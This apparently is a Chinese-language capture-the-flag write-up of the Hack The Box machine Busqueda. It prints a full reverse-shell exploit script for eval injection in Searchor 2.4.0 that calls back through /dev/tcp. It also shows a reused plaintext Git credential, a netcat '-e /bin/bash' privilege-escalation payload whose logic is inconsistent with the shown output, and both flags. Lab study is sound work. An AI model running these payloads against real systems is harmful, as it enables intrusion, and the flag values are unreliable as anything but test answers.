目录
连接至HTB服务器并启动靶机
使用nmap对靶机进行开放端口扫描
使用ffuf对该域名进行路径FUZZ
直接使用浏览器访问靶机80端口主页面
直接到Github上寻找相关PoC、EXP
USER_FLAG:0f2686aebbdb4c728050281a6fb742cf
特权提升
ROOT_FLAG:dde68ef0288190408c0c3eb102398590
连接至HTB服务器并启动靶机
靶机IP:10.10.11.208
分配IP:10.10.16.22
使用nmap对靶机进行开放端口扫描
nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.208
攻击开放两个端口:22、80。尝试先访问下靶机80端口
curl -I http://10.10.11.208:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.208:80
HTTP/1.1 302 Found
Date: Fri, 01 Nov 2024 06:04:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://searcher.htb/
Content-Type: text/html; charset=iso-8859-1
直接被重定位到了域名:searcher.htb
那就绑定一下靶机IP与该域名
echo '10.10.11.208 searcher.htb' >> /etc/hosts
再次使用curl访问该域名
curl -I http://searcher.htb/
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://searcher.htb/
HTTP/1.1 200 OK
Date: Fri, 01 Nov 2024 06:06:14 GMT
Server: Werkzeug/2.1.2 Python/3.10.6
Content-Type: text/html; charset=utf-8
Content-Length: 13519
使用ffuf对该域名进行路径FUZZ
ffuf -u http://searcher.htb/FUZZ -w ../dictionary/common.txt
直接使用浏览器访问靶机80端口主页面
拉到页面底部可以看到一个搜索框,还能选择搜索引擎
直接使用sqlmap尝试注入一下(虽然这个位置大概率没有和数据库交互)
sqlmap -r .\temp.txt --batch --dbs
结果也是不出意外,两个点应该都是直接转到了别的搜索引擎
在浏览器底部可以找到Searchor版本:2.4.0
点击它可以跳转到Github上的发布页面,我们点击这里查看它发行过的所有版本
在v2.4.2版本可以看到修复了一个漏洞,点击查看详情
查看该补丁修复漏洞详情
查看代码更改部分
@click.argument("query")
def search(engine, query, open, copy):
try:
url = eval(
f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
)
url = Engine[engine].search(query, copy_url=copy, open_web=open)
click.echo(url)
searchor.history.update(engine, query, url)
if open:
到了这里就不做代码审计了,需要学习的自行了解该py文件的代码注入方式
直接到Github上寻找相关PoC、EXP
#!/bin/bash -
default_port="9001"
port="${3:-$default_port}"
rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
plus="+"
echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"
if [ -z "${evil_cmd##*$plus*}" ]
then
evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
fi
if [ $# -ne 0 ]
then
echo "[*] Input target is $1"
echo "[*] Input attacker is $2:${port}"
echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
curl -s -X POST $1/search -d "engine=Google&query=${evil_cmd}" 1> /dev/null
else
echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example:
./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]"
fi
本地侧使用nc开启监听
nc -lvnp 1425
运行EXP脚本
bash exploit.sh http://searcher.htb/ 10.10.14.11 1425
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.208] 48886
bash: cannot set terminal process group (1639): Inappropriate ioctl for device
bash: no job control in this shell
svc@busqueda:/var/www/app$ whoami
whoami
svc
查看当前目录下所有文件
ls -a
svc@busqueda:/var/www/app$ ls -a
ls -a
. .. app.py .git templates
进入.git目录下
svc@busqueda:/var/www/app$ cd .git
cd .git
svc@busqueda:/var/www/app/.git$ ls
ls
branches config HEAD index logs refs
COMMIT_EDITMSG description hooks info objects
查看config文件内容
svc@busqueda:/var/www/app/.git$ cat config
cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
这里一串乱七八糟的字符串很像密码,尝试对当前用户(svc)进行SSH服务登录
ssh svc@10.10.11.208
账户:svc
密码:jh1usoih2bkjaspwe92
查找user_flag位置并查看user_flag内容
svc@busqueda:~$ find / -name 'user.txt' 2>/dev/null
/home/svc/user.txt
svc@busqueda:~$ cat /home/svc/user.txt
0f2686aebbdb4c728050281a6fb742cf
USER_FLAG:0f2686aebbdb4c728050281a6fb742cf
特权提升
查看当前用户可特权运行的命令
sudo -l
svc@busqueda:~$ sudo -l
[sudo] password for svc:
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
尝试直接复制该命令sudo执行
sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup
提示需要增加一个动作,那就full-checkup
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong
输出提示有错误,进入该py脚本目录下
cd /opt/scripts/
svc@busqueda:~$ cd /opt/scripts/
svc@busqueda:/opt/scripts$ ls
check-ports.py full-checkup.sh install-flask.sh system-checkup.py
再次运行命令,发现可以成功运行了
这就意味着,参数full-checkup很有可能是直接调用当前目录下的full.checkup.sh文件
回到原用户SSH登陆后默认目录
cd ~
新建一个full-checkup.sh文件,并写入payload赋执行权限
echo -e '#!/bin/bash\nnc -lvnp 1425 -e /bin/bash' > full-checkup.sh;chmod +x full-checkup.sh
本地侧nc开启监听
nc -lvnp 1425
执行特权命令
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
获取root权限
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.208] 40774
root@busqueda:/home/svc# whoami
whoami
root
查找root_flag并查看内容
root@busqueda:/home/svc# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@busqueda:/home/svc# cat /root/root.txt
cat /root/root.txt
dde68ef0288190408c0c3eb102398590